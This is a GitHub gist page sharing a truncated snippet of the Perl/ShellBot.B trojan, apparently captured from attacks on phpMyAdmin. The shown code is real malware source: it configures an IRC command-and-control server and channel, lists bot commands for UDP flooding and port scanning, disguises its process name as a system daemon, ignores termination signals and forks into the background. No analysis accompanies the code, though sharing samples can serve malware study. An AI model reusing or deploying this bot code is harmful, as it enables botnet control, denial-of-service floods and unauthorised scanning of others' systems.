Skip to content

Instantly share code, notes, and snippets.

@jamesejr

jamesejr/shellbot_a.pl

Last active January 1, 2016 06:59
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save jamesejr/8108446 to your computer and use it in GitHub Desktop.
Save jamesejr/8108446 to your computer and use it in GitHub Desktop.
Download ZIP
A snippet of the Perl/ShellBot.B Trojan variant script targeting phpMyAdmin
Raw
shellbot_a.pl
#!/usr/bin/perl
# ShellBOT
#
# Comenzi: !all
# - @udp <ip> <port> <timp>;
# - @fullportscan <ip> <start port> <final port>;
# - !quit;
# - !join <canal> <key> e !part <canal> <reason>;
# - !op !deop !voice !devoice <canal> <nick>;
# - !msg !ctcp 1 2;
# - !invite <canal> <nick>;
# - !nick <nick>;
# - !rnick;
# - !raw 1;
########## CONFIGURACAO ############
my $processo = '/usr/sbin/init.d';
$servidor='ircd.myz.info' unless $servidor;
my $porta='6667';
my @canais=("#pma");
my @adms=("X");
my @hostauth=("browsing.users.undernet.org");
# Anti Flood ( 6/3 Recomendado )
my $linas_max=6;
my $sleep=3;
my $nick = getnick();
my $ircname = getident2();
my $realname = "New Generation 2013";
my $acessoshell = 1;
######## Stealth ShellBot ##########
my $prefixo = "-";
my $estatisticas = 0;
my $pacotes = 1;
####################################
my $VERSAO = '0.2a';
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0";
my $pid=fork;
exit if $pid;
die "mort: $!" unless defined($pid);
my %irc_servers;
my %DCC;
my $dcc_sel = new IO::Select->new();
#####################
# Stealth Shellbot #
#####################
sub getnick {
#my $retornonick = &_get("http://");
#return $retornonick;
return "pm".int(rand(1000));
}
# <-- snip -->
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment